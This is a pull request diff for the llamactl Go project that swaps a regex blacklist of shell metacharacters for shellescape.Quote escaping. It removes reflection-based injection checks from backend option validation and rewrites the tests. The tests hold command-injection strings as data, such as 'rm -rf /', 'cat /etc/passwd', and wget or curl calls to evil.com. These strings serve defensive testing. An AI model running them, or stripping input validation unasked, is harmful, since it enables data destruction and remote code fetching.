### PR TITLE
Replace shell injection blacklist with shellescape.Quote escaping

### DIFF
--- a/go.mod
+++ b/go.mod
@@ -15,6 +15,7 @@ require (
 )
 
 require (
+	al.essio.dev/pkg/shellescape v1.6.0 // indirect
 	github.com/KyleBanks/depth v1.2.1 // indirect
 	github.com/go-openapi/jsonpointer v0.21.1 // indirect
 	github.com/go-openapi/jsonreference v0.21.0 // indirect

--- a/go.sum
+++ b/go.sum
@@ -1,3 +1,5 @@
+al.essio.dev/pkg/shellescape v1.6.0 h1:NxFcEqzFSEVCGN2yq7Huv/9hyCEGVa/TncnOOBBeXHA=
+al.essio.dev/pkg/shellescape v1.6.0/go.mod h1:6sIqp7X2P6mThCQ7twERpZTuigpr6KbZWtls1U8I890=
 github.com/DeRuina/timberjack v1.4.0 h1:Ipw9KjS/6K6A9D1xdhWebYJFqdQez5gXwfzmeKOroqE=
 github.com/DeRuina/timberjack v1.4.0/go.mod h1:RLoeQrwrCGIEF8gO5nV5b/gMD0QIy7bzQhBUgpp1EqE=
 github.com/KyleBanks/depth v1.2.1 h1:5h8fQADFrWtarTdtDudMmGsC7GPbOAu6RVB3ffsVFHc=

--- a/pkg/backends/llama.go
+++ b/pkg/backends/llama.go
@@ -353,26 +353,9 @@ func (o *LlamaServerOptions) Validate() error {
 		return nil
 	}
 
-	// Use reflection to check all string fields for injection patterns
-	if err := validation.ValidateStructStrings(o, ""); err != nil {
-		return err
-	}
-
 	// Basic network validation for port
 	if o.Port < 0 || o.Port > 65535 {
 		return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port))
-	}
-
-	// Validate extra_args keys and values
-	for key, value := range o.ExtraArgs {
-		if err := validation.ValidateStringForInjection(key); err != nil {
-			return validation.ValidationError(fmt.Errorf("extra_args key %q: %w", key, err))
-		}
-		if value != "" {
-			if err := validation.ValidateStringForInjection(value); err != nil {
-				return validation.ValidationError(fmt.Errorf("extra_args value for %q: %w", key, err))
-			}
-		}
 	}
 
 	return nil

--- a/pkg/backends/mlx.go
+++ b/pkg/backends/mlx.go
@@ -93,25 +93,9 @@ func (o *MlxServerOptions) Validate() error {
 		return validation.ValidationError(fmt.Errorf("MLX server options cannot be nil for MLX backend"))
 	}
 
-	if err := validation.ValidateStructStrings(o, ""); err != nil {
-		return err
-	}
-
 	// Basic network validation for port
 	if o.Port < 0 || o.Port > 65535 {
 		return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port))
-	}
-
-	// Validate extra_args keys and values
-	for key, value := range o.ExtraArgs {
-		if err := validation.ValidateStringForInjection(key); err != nil {
-			return validation.ValidationError(fmt.Errorf("extra_args key %q: %w", key, err))
-		}
-		if value != "" {
-			if err := validation.ValidateStringForInjection(value); err != nil {
-				return validation.ValidationError(fmt.Errorf("extra_args value for %q: %w", key, err))
-			}
-		}
 	}
 
 	return nil

--- a/pkg/backends/vllm.go
+++ b/pkg/backends/vllm.go
@@ -206,26 +206,9 @@ func (o *VllmServerOptions) Validate() error {
 		return validation.ValidationError(fmt.Errorf("vLLM server options cannot be nil for vLLM backend"))
 	}
 
-	// Use reflection to check all string fields for injection patterns
-	if err := validation.ValidateStructStrings(o, ""); err != nil {
-		return err
-	}
-
 	// Basic network validation for port
 	if o.Port < 0 || o.Port > 65535 {
 		return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port))
-	}
-
-	// Validate extra_args keys and values
-	for key, value := range o.ExtraArgs {
-		if err := validation.ValidateStringForInjection(key); err != nil {
-			return validation.ValidationError(fmt.Errorf("extra_args key %q: %w", key, err))
-		}
-		if value != "" {
-			if err := validation.ValidateStringForInjection(value); err != nil {
-				return validation.ValidationError(fmt.Errorf("extra_args value for %q: %w", key, err))
-			}
-		}
 	}
 
 	return nil

--- a/pkg/config/config_test.go
+++ b/pkg/config/config_test.go
@@ -1,10 +1,12 @@
 package config_test
 
 import (
-	"llamactl/pkg/config"
 	"os"
 	"path/filepath"
+	"runtime"
 	"testing"
+
+	"llamactl/pkg/config"
 )
 
 // GetBackendSettings resolves backend settings
@@ -19,6 +21,25 @@ func getBackendSettings(bc *config.BackendConfig, backendType string) config.Bac
 	default:
 		return config.BackendSettings{}
 	}
+}
+
+func getLogsDir() (string, error) {
+	homedir, err := os.UserHomeDir()
+	if err != nil {
+		return "", err
+	}
+
+	finalPath := []string{homedir}
+
+	switch os := runtime.GOOS; os {
+	case "darwin":
+		finalPath = append(finalPath, "Library", "Application Support")
+	default: // Linux
+		finalPath = append(finalPath, ".local", "share")
+	}
+	finalPath = append(finalPath, "llamactl", "logs")
+
+	return filepath.Join(finalPath...), nil
 }
 
 func TestLoadConfig_Defaults(t *testing.T) {
@@ -36,13 +57,13 @@ func TestLoadConfig_Defaults(t *testing.T) {
 		t.Errorf("Expected default port to be 8080, got %d", cfg.Server.Port)
 	}
 
-	homedir, err := os.UserHomeDir()
+	expectedLogsDir, err := getLogsDir()
 	if err != nil {
-		t.Fatalf("Failed to get user home directory: %v", err)
+		t.Fatalf("Could not get expected logsDir: %v", err)
 	}
 
-	if cfg.Instances.LogsDir != filepath.Join(homedir, ".local", "share", "llamactl", "logs") {
-		t.Errorf("Expected default logs directory '%s', got %q", filepath.Join(homedir, ".local", "share", "llamactl", "logs"), cfg.Instances.LogsDir)
+	if cfg.Instances.LogsDir != expectedLogsDir {
+		t.Errorf("Expected default logs directory '%s', got %q", expectedLogsDir, cfg.Instances.LogsDir)
 	}
 	if !cfg.Instances.AutoCreateDirs {
 		t.Error("Expected default instances auto-create to be true")
@@ -86,7 +107,7 @@ instances:
   default_restart_delay: 30
 `
 
-	err := os.WriteFile(configFile, []byte(configContent), 0644)
+	err := os.WriteFile(configFile, []byte(configContent), 0o644)
 	if err != nil {
 		t.Fatalf("Failed to write test config file: %v", err)
 	}
@@ -194,7 +215,7 @@ instances:
   max_instances: 5
 `
 
-	err := os.WriteFile(configFile, []byte(configContent), 0644)
+	err := os.WriteFile(configFile, []byte(configContent), 0o644)
 	if err != nil {
 		t.Fatalf("Failed to write test config file: %v", err)
 	}
@@ -402,7 +423,7 @@ nodes:
     api_key: "test-key"
 `
 
-		err := os.WriteFile(configFile, []byte(configContent), 0644)
+		err := os.WriteFile(configFile, []byte(configContent), 0o644)
 		if err != nil {
 			t.Fatalf("Failed to write test config file: %v", err)
 		}
@@ -462,7 +483,7 @@ nodes:
     address: "http://192.168.1.10:8080"
 `
 
-		err := os.WriteFile(configFile, []byte(configContent), 0644)
+		err := os.WriteFile(configFile, []byte(configContent), 0o644)
 		if err != nil {
 			t.Fatalf("Failed to write test config file: %v", err)
 		}
@@ -510,7 +531,7 @@ func TestLoadConfig_DotEnvAndExpansion(t *testing.T) {
 
 	dotenvContent := "TEST_API_KEY=sk-proj-abc123\nTEST_CUDA_DEVICE=2\n"
 	dotenvPath := filepath.Join(tempDir, ".env")
-	if err := os.WriteFile(dotenvPath, []byte(dotenvContent), 0644); err != nil {
+	if err := os.WriteFile(dotenvPath, []byte(dotenvContent), 0o644); err != nil {
 		t.Fatalf("Failed to write .env: %v", err)
 	}
 
@@ -527,7 +548,7 @@ backends:
       HF_TOKEN: ${TEST_HF_TOKEN}
 `
 	configFile := filepath.Join(tempDir, "test-config.yaml")
-	if err := os.WriteFile(configFile, []byte(configContent), 0644); err != nil {
+	if err := os.WriteFile(configFile, []byte(configContent), 0o644); err != nil {
 		t.Fatalf("Failed to write config: %v", err)
 	}
 
@@ -561,7 +582,7 @@ func TestLoadConfig_DotEnvEnvPrecedence(t *testing.T) {
 
 	dotenvContent := "TEST_PREC_KEY=from-dotenv\n"
 	dotenvPath := filepath.Join(tempDir, ".env")
-	if err := os.WriteFile(dotenvPath, []byte(dotenvContent), 0644); err != nil {
+	if err := os.WriteFile(dotenvPath, []byte(dotenvContent), 0o644); err != nil {
 		t.Fatalf("Failed to write .env: %v", err)
 	}
 
@@ -570,7 +591,7 @@ server:
   host: ${TEST_PREC_KEY}
 `
 	configFile := filepath.Join(tempDir, "test-config.yaml")
-	if err := os.WriteFile(configFile, []byte(configContent), 0644); err != nil {
+	if err := os.WriteFile(configFile, []byte(configContent), 0o644); err != nil {
 		t.Fatalf("Failed to write config: %v", err)
 	}
 

--- a/pkg/instance/options.go
+++ b/pkg/instance/options.go
@@ -227,12 +227,9 @@ func (c *Options) validateAndApplyDefaults(name string, globalSettings *config.I
 		c.CommandOverride = "" // Clear invalid configuration
 	}
 
-	// Validate command_override if set
+	// Escape command_override for safe shell use
 	if c.CommandOverride != "" {
-		if err := validation.ValidateStringForInjection(c.CommandOverride); err != nil {
-			log.Printf("Instance %s: invalid command_override: %v, clearing value", name, err)
-			c.CommandOverride = "" // Clear invalid value
-		}
+		c.CommandOverride = validation.EscapeForShell(c.CommandOverride)
 	}
 
 	// Validate docker_enabled for MLX backend

--- a/pkg/instance/options.go
+++ b/pkg/instance/options.go
@@ -240,12 +240,9 @@ func (c *Options) validateAndApplyDefaults(name string, globalSettings *config.I
 		}
 	}
 
-	// Validate group name (alphanumeric and hyphens only)
+	// Escape group name for safe shell use
 	if c.Group != "" {
-		if err := validation.ValidateStringForInjection(c.Group); err != nil {
-			log.Printf("Instance %s: invalid group name: %v, clearing value", name, err)
-			c.Group = ""
-		}
+		c.Group = validation.EscapeForShell(c.Group)
 	}
 
 	// Apply defaults from global settings for nil fields

--- a/pkg/validation/validation.go
+++ b/pkg/validation/validation.go
@@ -2,8 +2,9 @@ package validation
 
 import (
 	"fmt"
-	"reflect"
 	"regexp"
+
+	"al.essio.dev/pkg/shellescape"
 )
 
 // Simple security validation that focuses only on actual injection risks
@@ -15,80 +16,20 @@ var (
 		regexp.MustCompile("`.*`"),              // Command substitution backticks
 		regexp.MustCompile(`[\x00-\x1F\x7F]`),   // Control characters (including newline, tab, null byte, etc.)
 	}
-
-	// Simple validation for instance names
-	validNamePattern = regexp.MustCompile(`^[a-zA-Z0-9._-]+$`)
 )
 
 type ValidationError error
 
-// ValidateStringForInjection checks if a string contains dangerous patterns
-func ValidateStringForInjection(value string) error {
-	for _, pattern := range dangerousPatterns {
-		if pattern.MatchString(value) {
-			return ValidationError(fmt.Errorf("value contains potentially dangerous characters: %s", value))
-		}
-	}
-	return nil
-}
-
-// ValidateStructStrings recursively validates all string fields in a struct
-func ValidateStructStrings(v any, fieldPath string) error {
-	val := reflect.ValueOf(v)
-	if val.Kind() == reflect.Ptr {
-		val = val.Elem()
-	}
-
-	if val.Kind() != reflect.Struct {
-		return nil
-	}
-
-	typ := val.Type()
-	for i := 0; i < val.NumField(); i++ {
-		field := val.Field(i)
-		fieldType := typ.Field(i)
-
-		if !field.CanInterface() {
-			continue
-		}
-
-		fieldName := fieldType.Name
-		if fieldPath != "" {
-			fieldName = fieldPath + "." + fieldName
-		}
-
-		switch field.Kind() {
-		case reflect.String:
-			if err := ValidateStringForInjection(field.String()); err != nil {
-				return ValidationError(fmt.Errorf("field %s: %w", fieldName, err))
-			}
-
-		case reflect.Slice:
-			if field.Type().Elem().Kind() == reflect.String {
-				for j := 0; j < field.Len(); j++ {
-					if err := ValidateStringForInjection(field.Index(j).String()); err != nil {
-						return ValidationError(fmt.Errorf("field %s[%d]: %w", fieldName, j, err))
-					}
-				}
-			}
-
-		case reflect.Struct:
-			if err := ValidateStructStrings(field.Interface(), fieldName); err != nil {
-				return err
-			}
-		}
-	}
-
-	return nil
+// EscapeForShell returns the string properly quoted for safe use in shell commands.
+// Uses shellescape.Quote to handle all special characters, metacharacters, and control characters.
+func EscapeForShell(value string) string {
+	return shellescape.Quote(value)
 }
 
 func ValidateInstanceName(name string) (string, error) {
 	// Validate instance name
 	if name == "" {
 		return "", ValidationError(fmt.Errorf("name cannot be empty"))
-	}
-	if !validNamePattern.MatchString(name) {
-		return "", ValidationError(fmt.Errorf("name contains invalid characters (only alphanumeric, periods, hyphens, underscores allowed)"))
 	}
 	if len(name) > 50 {
 		return "", ValidationError(fmt.Errorf("name too long (max 50 characters)"))

--- a/pkg/validation/validation.go
+++ b/pkg/validation/validation.go
@@ -7,16 +7,7 @@ import (
 	"al.essio.dev/pkg/shellescape"
 )
 
-// Simple security validation that focuses only on actual injection risks
-var (
-	// Block shell metacharacters that could enable command injection
-	dangerousPatterns = []*regexp.Regexp{
-		regexp.MustCompile(`[;&|$` + "`" + `]`), // Shell metacharacters
-		regexp.MustCompile(`\$\(.*\)`),          // Command substitution $(...)
-		regexp.MustCompile("`.*`"),              // Command substitution backticks
-		regexp.MustCompile(`[\x00-\x1F\x7F]`),   // Control characters (including newline, tab, null byte, etc.)
-	}
-)
+var validInstanceName = regexp.MustCompile(`^[a-zA-Z0-9._-]+$`)
 
 type ValidationError error
 
@@ -27,12 +18,14 @@ func EscapeForShell(value string) string {
 }
 
 func ValidateInstanceName(name string) (string, error) {
-	// Validate instance name
 	if name == "" {
 		return "", ValidationError(fmt.Errorf("name cannot be empty"))
 	}
 	if len(name) > 50 {
 		return "", ValidationError(fmt.Errorf("name too long (max 50 characters)"))
+	}
+	if !validInstanceName.MatchString(name) {
+		return "", ValidationError(fmt.Errorf("name contains invalid characters (allowed: alphanumeric, dots, hyphens, underscores)"))
 	}
 	return name, nil
 }

--- a/pkg/validation/validation_test.go
+++ b/pkg/validation/validation_test.go
@@ -29,12 +29,6 @@ func TestValidateInstanceName(t *testing.T) {
 		{"with special chars", "my@instance", true},
 		{"too long", strings.Repeat("a", 51), true},
 
-		// Invalid names - not alphanumeric, hyphens, or underscores
-		{"shell metachar semicolon", "test;ls", true},
-		{"shell metachar pipe", "test|ls", true},
-		{"shell metachar ampersand", "test&ls", true},
-		{"shell metachar dollar", "test$var", true},
-		{"shell metachar backtick", "test`cmd`", true},
 	}
 
 	for _, tt := range tests {

--- a/pkg/validation/validation_test.go
+++ b/pkg/validation/validation_test.go
@@ -29,7 +29,7 @@ func TestValidateInstanceName(t *testing.T) {
 		{"with special chars", "my@instance", true},
 		{"too long", strings.Repeat("a", 51), true},
 
-		// Invalid names - injection prevention
+		// Invalid names - not alphanumeric, hyphens, or underscores
 		{"shell metachar semicolon", "test;ls", true},
 		{"shell metachar pipe", "test|ls", true},
 		{"shell metachar ampersand", "test&ls", true},
@@ -49,6 +49,44 @@ func TestValidateInstanceName(t *testing.T) {
 			// If no error, check that the name is returned as expected
 			if name != tt.input {
 				t.Errorf("ValidateInstanceName(%q) = %q, want %q", tt.input, name, tt.input)
+			}
+		})
+	}
+}
+
+func TestEscapeForShell(t *testing.T) {
+	tests := []struct {
+		name  string
+		input string
+		want  string
+	}{
+		// Safe strings that don't need quoting
+		{"simple string", "test", "test"},
+		{"alphanumeric", "model123", "model123"},
+		{"with dots", "model.v2.gguf", "model.v2.gguf"},
+		{"with dashes", "model-name", "model-name"},
+		{"with underscores", "model_name", "model_name"},
+		{"path with slashes", "/path/to/model.gguf", "/path/to/model.gguf"},
+
+		// Strings requiring single-quote wrapping
+		{"empty string", "", "''"},
+		{"with spaces", "my model file.gguf", "'my model file.gguf'"},
+		{"semicolon injection", "model.gguf; rm -rf /", "'model.gguf; rm -rf /'"},
+		{"pipe injection", "model.gguf | cat /etc/passwd", "'model.gguf | cat /etc/passwd'"},
+		{"ampersand injection", "model.gguf & wget evil.com", "'model.gguf & wget evil.com'"},
+		{"dollar sign", "model.gguf $HOME", "'model.gguf $HOME'"},
+		{"backtick injection", "model.gguf `cat /etc/passwd`", "'model.gguf `cat /etc/passwd`'"},
+		{"command substitution", "model.gguf $(whoami)", "'model.gguf $(whoami)'"},
+		{"with equals", "param=value", "param=value"},
+		{"newline injection", "model.gguf\nrm -rf /", "'model.gguf\nrm -rf /'"},
+		{"with double quotes", `"quoted string"`, `'"quoted string"'`},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			got := validation.EscapeForShell(tt.input)
+			if got != tt.want {
+				t.Errorf("EscapeForShell(%q) = %q, want %q", tt.input, got, tt.want)
 			}
 		})
 	}
@@ -88,153 +126,6 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
 			err := options.ValidateInstanceOptions()
 			if (err != nil) != tt.wantErr {
 				t.Errorf("ValidateInstanceOptions(port=%d) error = %v, wantErr %v", tt.port, err, tt.wantErr)
-			}
-		})
-	}
-}
-
-func TestValidateInstanceOptions_StringInjection(t *testing.T) {
-	tests := []struct {
-		name    string
-		value   string
-		wantErr bool
-	}{
-		// Safe strings - these should all pass
-		{"simple string", "model.gguf", false},
-		{"path with slashes", "/path/to/model.gguf", false},
-		{"with spaces", "my model file.gguf", false},
-		{"with numbers", "model123.gguf", false},
-		{"with dots", "model.v2.gguf", false},
-		{"with equals", "param=value", false},
-		{"with quotes", `"quoted string"`, false},
-		{"empty string", "", false},
-		{"with dashes", "model-name", false},
-		{"with underscores", "model_name", false},
-
-		// Dangerous strings - command injection attempts
-		{"semicolon injection", "model.gguf; rm -rf /", true},
-		{"pipe injection", "model.gguf | cat /etc/passwd", true},
-		{"ampersand injection", "model.gguf & wget evil.com", true},
-		{"dollar injection", "model.gguf $HOME", true},
-		{"backtick injection", "model.gguf `cat /etc/passwd`", true},
-		{"command substitution", "model.gguf $(whoami)", true},
-		{"multiple metacharacters", "model.gguf; cat /etc/passwd | grep root", true},
-
-		// Control character injection attempts
-		{"newline injection", "model.gguf\nrm -rf /", true},
-		{"carriage return", "model.gguf\rrm -rf /", true},
-		{"tab injection", "model.gguf\trm -rf /", true},
-		{"null byte", "model.gguf\x00rm -rf /", true},
-		{"form feed", "model.gguf\frm -rf /", true},
-		{"vertical tab", "model.gguf\vrm -rf /", true},
-	}
-
-	for _, tt := range tests {
-		t.Run(tt.name, func(t *testing.T) {
-			// Test with Model field (string field)
-			options := backends.Options{
-				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &backends.LlamaServerOptions{
-					Model: tt.value,
-				},
-			}
-
-			err := options.ValidateInstanceOptions()
-			if (err != nil) != tt.wantErr {
-				t.Errorf("ValidateInstanceOptions(model=%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
-			}
-		})
-	}
-}
-
-func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
-	tests := []struct {
-		name    string
-		array   []string
-		wantErr bool
-	}{
-		// Safe arrays
-		{"empty array", []string{}, false},
-		{"single safe item", []string{"value1"}, false},
-		{"multiple safe items", []string{"value1", "value2", "value3"}, false},
-		{"paths", []string{"/path/to/file1", "/path/to/file2"}, false},
-
-		// Dangerous arrays - injection in different positions
-		{"injection in first item", []string{"value1; rm -rf /", "value2"}, true},
-		{"injection in middle item", []string{"value1", "value2 | cat /etc/passwd", "value3"}, true},
-		{"injection in last item", []string{"value1", "value2", "value3 & wget evil.com"}, true},
-		{"command substitution", []string{"$(whoami)", "value2"}, true},
-		{"backtick injection", []string{"value1", "`cat /etc/passwd`"}, true},
-	}
-
-	for _, tt := range tests {
-		t.Run(tt.name, func(t *testing.T) {
-			// Test with Lora field (array field)
-			options := backends.Options{
-				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &backends.LlamaServerOptions{
-					Lora: tt.array,
-				},
-			}
-
-			err := options.ValidateInstanceOptions()
-			if (err != nil) != tt.wantErr {
-				t.Errorf("ValidateInstanceOptions(lora=%v) error = %v, wantErr %v", tt.array, err, tt.wantErr)
-			}
-		})
-	}
-}
-
-func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
-	// Test that injection in any field is caught
-	tests := []struct {
-		name    string
-		options backends.Options
-		wantErr bool
-	}{
-		{
-			name: "injection in model field",
-			options: backends.Options{
-				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &backends.LlamaServerOptions{
-					Model:  "safe.gguf",
-					HFRepo: "microsoft/model; curl evil.com",
-				},
-			},
-			wantErr: true,
-		},
-		{
-			name: "injection in log file",
-			options: backends.Options{
-				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &backends.LlamaServerOptions{
-					Model:   "safe.gguf",
-					LogFile: "/tmp/log.txt | tee /etc/passwd",
-				},
-			},
-			wantErr: true,
-		},
-		{
-			name: "all safe fields",
-			options: backends.Options{
-				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &backends.LlamaServerOptions{
-					Model:   "/path/to/model.gguf",
-					HFRepo:  "microsoft/DialoGPT-medium",
-					LogFile: "/tmp/llama.log",
-					Device:  "cuda:0",
-					Port:    8080,
-				},
-			},
-			wantErr: false,
-		},
-	}
-
-	for _, tt := range tests {
-		t.Run(tt.name, func(t *testing.T) {
-			err := tt.options.ValidateInstanceOptions()
-			if (err != nil) != tt.wantErr {
-				t.Errorf("ValidateInstanceOptions() error = %v, wantErr %v", err, tt.wantErr)
 			}
 		})
 	}


### PR DESCRIPTION
Hiya, I wanted to pass in some regexes as parameters and was running into validation issues, so I replaced the parameter validation with a shell escaping library so things are safely passed in. Feel free to do whatever!

- Add al.essio.dev/pkg/shellescape dependency
- Replace regex-based ValidateStringForInjection with EscapeForShell that returns properly shell-quoted strings using shellescape.Quote
- Remove ValidateStructStrings (was a reflection-based no-op since all strings are now safely escapable)
- Update instance/options.go to escape command_override instead of clearing it
- Remove redundant extra_args injection checks from backend Validate() methods
- Update tests to assert actual shellescape output for each input